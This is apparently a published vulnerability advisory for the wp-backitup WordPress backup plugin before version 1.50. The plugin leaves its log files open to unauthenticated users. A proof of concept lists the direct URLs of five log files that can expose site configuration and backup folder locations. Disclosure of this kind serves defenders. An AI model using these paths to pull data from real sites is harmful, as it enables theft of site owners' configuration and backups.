WordPress Plugin Vulnerabilities
Backup and Restore WordPress < 1.50 - Unauthenticated Sensitive Data Exposure
Description
The plugin does not protect some log files containing sensitive information such as site configuration etc, allowing unauthenticated users to access such data.
Proof of Concept
1) There is a lot of sensitive data and most importantly, you can download this logs to your machine and read it. These files may also contain a full link to the backup folders if the backup is successful. "https://example.com/wordpress/wp-content/plugins/wp-backitup/logs/debug_usage.log" "https://example.com/wordpress/wp-content/plugins/wp-backitup/logs/backup_status.log" "https://example.com/wordpress/wp-content/plugins/wp-backitup/logs/backup_response.log" "https://example.com/wordpress/wp-content/plugins/wp-backitup/logs/debug_DATABASE_Upgrade.log" "https://example.com/wordpress/wp-content/plugins/wp-backitup/logs/debug_PLUGIN_Upgrade.log"
Affects Plugins
References
CVE
Classification
Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
CWE
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-05 (about 1 months ago)
Added
2024-03-05 (about 1 months ago)
Last Updated
2024-04-02 (about 25 days ago)